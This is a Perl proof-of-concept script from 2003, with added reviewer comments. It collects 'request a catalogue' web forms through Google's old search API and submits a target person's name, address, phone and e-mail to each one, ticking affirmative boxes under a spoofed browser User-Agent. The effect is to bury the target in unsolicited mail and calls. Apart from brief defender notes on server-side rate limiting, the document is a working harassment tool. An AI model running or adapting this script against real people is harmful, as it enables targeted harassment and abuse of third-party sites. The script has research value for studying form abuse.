#!usr/bin/perl
# NOTE(review): the shebang above lacks the leading slash, so the script is
# presumably invoked as "perl angola.pl" rather than directly.
# angola.pl
#
# 'Proof of concept' code for the attack described in 'Defending against
# an Internet-based attack on the Physical World' by Byers, Rubin and
# Kormann.
#
# What the script does, as written below: it uses the Google SOAP search API
# to collect up to 1000 URLs for a query aimed at "request a catalogue" style
# pages, then fetches each page, matches its form fields by name against the
# configured target details, prints the filled-in form, and (when $debug is
# not 1) submits it. The consequence for the target is unsolicited physical
# mail, phone calls and e-mail from many unrelated organisations.
#
# Defender's notes: the abuse this demonstrates is a server-side problem for
# the form owners. Server-side mitigations are the ones the paper discusses --
# the script itself offers nothing to detect on the target's side. Submissions
# from this script are uniform (fixed User-Agent string, fixed message text,
# one GET followed by one POST per form), which a form owner can rate-limit or
# recognise.
#
# Written in April 2003 by James Fell
# james@kaleton.com
# http://www.kaleton.com/infosec/

# NOTE(review): no "use strict; use warnings;" -- every variable in this file
# is a package global, and the subs below read the configuration directly
# from these globals rather than taking it as arguments.
use LWP;
use HTML::Form;
use SOAP::Lite;
use URI::Escape;      # NOTE(review): no uri_escape()/uri_unescape() call is visible in this file

#################################################################################
# Configuration code is here. This should be edited.

# The target name and address go here. These values are only ever used as
# form-field values in fill_form(); nothing validates or escapes them.
$targetTitle = "Mr";
$targetName = "Joe Bloggs";
$targetFirstname = "Joe";
$targetSurname = "Bloggs";
$targetCompany = "Acme Inc";
$targetDepartment = "Senior Management";
$targetJobtitle = "Director";
$targetStreet = "7 Fake Road";
$targetTown = "Fakesville";
$targetCounty = "Lancashire";
$targetPostcode = "OL12 5OL";
$targetCountry = "United Kingdom";
$targetFulladdress = "7 Fake Road, Fakesville, Lancashire, OL12 5OL, United Kingdom";
$targetPhone = "01706 123 456";
$targetFax = "01706 123 457";
$targetEmail = "joebloggs\@fake.acme.com";    # backslash keeps "@fake" from interpolating as an array

# Obtain a Google API key at http://www.google.com/apis/
# (Placeholder value; google_search() rewrites the API's quota-exceeded fault
# message to point at this setting.)
$google_key = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';

# The search query to use on Google
$query = 'request catalogue name address postcode';

# Set this to 1 for debug mode.
# In debug mode fill_form() prints the filled-in form but never submits it;
# the submit happens only when $debug != 1. The shipped default is 1.
$debug = 1;

# Pretend to be a web browser
# Sent as the User-Agent on every request made by fill_form().
$spoofedUserAgent = 'Mozilla/4.0 (compatible; MSIE 5.22; Mac_PowerPC)';

# Set this to 1 to use a HTTP proxy
# $proxy is passed to LWP::UserAgent->proxy(http => ...) only when $useproxy == 1.
$useproxy = 0;
$proxy = 'http://proxy-ip:proxy-port/';

#################################################################################
# Nothing below here needs to be edited.
# Function to run a query on Google
#
# Calls doGoogleSearch on the SOAP::Lite service $service with the fixed
# options restrict='', safe=0, lr='', ie='latin1', oe='utf8'.
#
# Arguments: $service (SOAP::Lite service object), $key (API key), $q (query
# string), $start (result offset), $max (results per page), $filter.
# Returns whatever doGoogleSearch returned; on a SOAP fault the fault string
# is stored under $response->{'err'} (autovivifying a hash if the call
# returned undef). The caller, get_urls(), does not look at 'err'.
sub google_search {
    my ($service, $key, $q, $start, $max, $filter) = @_;
    my ($restrict, $safe, $lr, $ie, $oe) = ('', 0, '', 'latin1', 'utf8');
    my $response = $service->doGoogleSearch(
        $key, $q, $start, $max, $filter, $restrict, $safe, $lr, $ie, $oe);
    if ($service->call->fault) {
        $response->{'err'} = $service->call->faultstring;
        # Google's quota fault quotes the offending key; replace everything
        # after "exceeded for key" so the key is not echoed and the user is
        # told to supply their own. The literal below starts with a newline
        # because the string spans the line break.
        if ($response->{'err'} =~ /exceeded for key.*$/) {
            my $err_addendum = '
[Please provide your own key]';
            $response->{'err'} =~ s/(?<=exceeded for key).*$/$err_addendum/;
        }
    }
    return $response;
}

# Function to get a list of URLs from Google
#
# Pages through the search results for the global $query in steps of 10 and
# collects each result's URL. Returns the list of URLs (up to 1000).
# NOTE(review): the SOAP search API described by the WSDL below was retired
# by Google many years ago, so as written this step cannot return results.
sub get_urls {
    $maxresults = 10;
    $filter = 0;

    # load the Google service definition
    $service = SOAP::Lite->service("http://api.google.com/GoogleSearch.wsdl");

    # Grab the first 1000 search results and stick them in an array
    for ($start=0; $start<=990; $start+=10) {
        $response = google_search($service, $google_key, $query, $start, $maxresults, $filter);
        # Results are stored at index $start onwards rather than pushed, so a
        # page with fewer than 10 results (or a faulted call, which has no
        # resultElements) leaves undef slots that the main loop later passes
        # to fill_form().
        $i=$start;
        for $result (@{$response->{'resultElements'}}) {
            $urls_array[$i] = $result->{'URL'};
            $i++;
        }
    }
    return @urls_array;
}

# Function to fill in a web form
#
# Fetches $_[0] with a spoofed User-Agent (optionally via $proxy), parses the
# first <form> on the page, and sets field values by heuristically matching
# each input's name and type against the configured target details. The
# filled form is always printed via HTML::Form::dump; it is submitted
# (form->click) only when the global $debug is not 1.
# All variables here are package globals (no strict/my), so they persist
# across calls.
sub fill_form {
    $form_url = $_[0];

    $ua = new LWP::UserAgent;
    $ua->agent($spoofedUserAgent);
    $ua->timeout(10);      # seconds; unreachable hosts are given up on rather than blocking the run
    if ($useproxy == 1) {
        $ua->proxy(http => $proxy);
    }

    $request = new HTTP::Request('GET', $form_url);
    # as_string() on the response includes the status line and headers ahead
    # of the body; HTML::Form->parse is given that whole string.
    $form_html = ($ua->request($request))->as_string();
    # In scalar context parse() returns the first form found, or undef.
    $form = HTML::Form->parse($form_html, $form_url);

    if ($form ne undef) {
        for $formInput ($form->inputs) {
            # A textarea whose name mentions "address" gets the one-line full
            # address; the text/textarea chain further down may overwrite it.
            if ($formInput->type eq "textarea") {
                if ($formInput->name =~ /address/i) {
                    $form->value($formInput->name => $targetFulladdress);
                }
            }
            # Every password field is given the same constant value.
            if ($formInput->type eq "password") {
                $form->value($formInput->name => "daiichi596");
            }
            # <select> inputs: pick the option that equals the target's title
            # or country, if the select's name suggests that is what it holds.
            if ($formInput->type eq "option") {
                for $optionValue ($formInput->possible_values) {
                    if (($formInput->name =~ /title/i) && ($optionValue eq $targetTitle)) {
                        $form->value($formInput->name => $targetTitle);
                    }
                    elsif (($formInput->name =~ /country/i) && ($optionValue eq $targetCountry)) {
                        $form->value($formInput->name => $targetCountry);
                    }
                }
            }
            # Checkboxes and radios: turn on any option whose value looks like
            # an affirmative, regardless of what the field is asking.
            if (($formInput->type eq "checkbox") || ($formInput->type eq "radio")) {
                for $optionValue ($formInput->possible_values) {
                    if ($optionValue eq 'Y') {
                        $form->value($formInput->name => 'Y');
                    }
                    elsif ($optionValue eq 'y') {
                        $form->value($formInput->name => 'y');
                    }
                    elsif ($optionValue eq '1') {
                        $form->value($formInput->name => '1');
                    }
                    elsif ($optionValue eq 'on') {
                        $form->value($formInput->name => 'on');
                    }
                    elsif ($optionValue eq 'Yes') {
                        $form->value($formInput->name => 'Yes');
                    }
                    elsif ($optionValue eq 'yes') {
                        $form->value($formInput->name => 'yes');
                    }
                    elsif ($optionValue eq 'YES') {
                        $form->value($formInput->name => 'YES');
                    }
                    elsif ($optionValue eq 'interested') {
                        $form->value($formInput->name => 'interested');
                    }
                }
            }
            # Free-text inputs: the first matching pattern in this chain wins,
            # so the more specific names (firstname, jobtitle, post_code, ...)
            # are listed before the generic ones they contain (name, title,
            # ...). Patterns are unanchored substring matches.
            if ( ($formInput->type eq "text") || ($formInput->type eq "textarea") ) {
                # From here on $formInput holds the input's name string, not
                # the HTML::Form::Input object.
                $formInput = $formInput->name;
                if ($formInput =~ /firstname/i) {
                    $form->value($formInput => $targetFirstname);
                }
                elsif ($formInput =~ /first_name/i) {
                    $form->value($formInput => $targetFirstname);
                }
                elsif ($formInput =~ /forename/i) {
                    $form->value($formInput => $targetFirstname);
                }
                elsif ($formInput =~ /surname/i) {
                    $form->value($formInput => $targetSurname);
                }
                elsif ($formInput =~ /lastname/i) {
                    $form->value($formInput => $targetSurname);
                }
                elsif ($formInput =~ /last_name/i) {
                    $form->value($formInput => $targetSurname);
                }
                elsif ($formInput =~ /name/i) {
                    $form->value($formInput => $targetName);
                }
                elsif ($formInput =~ /company/i) {
                    $form->value($formInput => $targetCompany);
                }
                elsif ($formInput =~ /organisation/i) {
                    $form->value($formInput => $targetCompany);
                }
                elsif ($formInput =~ /organization/i) {
                    $form->value($formInput => $targetCompany);
                }
                elsif ($formInput =~ /department/i) {
                    $form->value($formInput => $targetDepartment);
                }
                elsif ($formInput =~ /dept/i) {
                    $form->value($formInput => $targetDepartment);
                }
                elsif ($formInput =~ /jobtitle/i) {
                    $form->value($formInput => $targetJobtitle);
                }
                elsif ($formInput =~ /position/i) {
                    $form->value($formInput => $targetJobtitle);
                }
                elsif ($formInput =~ /title/i) {
                    $form->value($formInput => $targetTitle);
                }
                elsif ($formInput eq /address/i) {
                    $form->value($formInput => $targetStreet);
                }
                # The "addr" + digit branches use a plain string ("1", "2",
                # "3") as the second pattern, i.e. the digit may appear
                # anywhere in the field name.
                elsif (($formInput =~ /addr/i) && ($formInput =~ "1")) {
                    $form->value($formInput => $targetStreet);
                }
                elsif ($formInput =~ /street/i) {
                    $form->value($formInput => $targetStreet);
                }
                elsif ($formInput =~ /road/i) {
                    $form->value($formInput => $targetStreet);
                }
                elsif ($formInput =~ /house/i) {
                    $form->value($formInput => $targetStreet);
                }
                elsif (($formInput =~ /addr/i) && ($formInput =~ "2")) {
                    $form->value($formInput => $targetTown);
                }
                elsif ($formInput =~ /town/i) {
                    $form->value($formInput => $targetTown);
                }
                elsif ($formInput =~ /suburb/i) {
                    $form->value($formInput => $targetTown);
                }
                elsif ($formInput =~ /city/i) {
                    $form->value($formInput => $targetTown);
                }
                elsif (($formInput =~ /addr/i) && ($formInput =~ "3")) {
                    $form->value($formInput => $targetCounty);
                }
                elsif ($formInput =~ /county/i) {
                    $form->value($formInput => $targetCounty);
                }
                elsif ($formInput =~ /state/i) {
                    $form->value($formInput => $targetCounty);
                }
                elsif ($formInput =~ /province/i) {
                    $form->value($formInput => $targetCounty);
                }
                elsif ($formInput =~ /postcode/i) {
                    $form->value($formInput => $targetPostcode);
                }
                elsif ($formInput =~ /post_code/i) {
                    $form->value($formInput => $targetPostcode);
                }
                elsif ($formInput =~ /zip/i) {
                    $form->value($formInput => $targetPostcode);
                }
                elsif ($formInput =~ /country/i) {
                    $form->value($formInput => $targetCountry);
                }
                elsif ($formInput =~ /phone/i) {
                    $form->value($formInput => $targetPhone);
                }
                elsif ($formInput =~ /tel/i) {
                    $form->value($formInput => $targetPhone);
                }
                elsif ($formInput =~ /fone/i) {
                    $form->value($formInput => $targetPhone);
                }
                elsif ($formInput =~ /fax/i) {
                    $form->value($formInput => $targetFax);
                }
                elsif ($formInput =~ /email/i) {
                    $form->value($formInput => $targetEmail);
                }
                elsif ($formInput =~ /e-mail/i) {
                    $form->value($formInput => $targetEmail);
                }
                # Subject-like and message-like fields get fixed boilerplate;
                # that constant text is the same in every submission the
                # script makes.
                elsif ($formInput =~ /subj/i) {
                    $form->value($formInput => "information request");
                }
                elsif ($formInput =~ /topic/i) {
                    $form->value($formInput => "information request");
                }
                elsif ($formInput =~ /message/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /body/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /comment/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /query/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /interests/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /enquiry/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
                elsif ($formInput =~ /inquiry/i) {
                    $form->value($formInput => "Please send me more information by post.");
                }
            }
        }
        # Always show what would be sent; only send it outside debug mode.
        print "\n";
        print $form->dump;
        print "\n";
        if ($debug != 1) {
            $ua->request($form->click);
        }
    }
    else {
        print "\n";
        print "This web page doesn't contain a form\n";
        print "\n";
    }
}

# Get a big list of form URLs
@result = get_urls();

# Fill them all in
# Each element of @result (including any undef slots left by get_urls) is
# passed straight to fill_form(); the counter is only for the progress output.
$form_count=0;
for $result (@result) {
    $form_count++;
    print "Form URL : $result\n";
    print "Form Number : $form_count\n";
    fill_form($result);
}

# End of Script
#################################################################################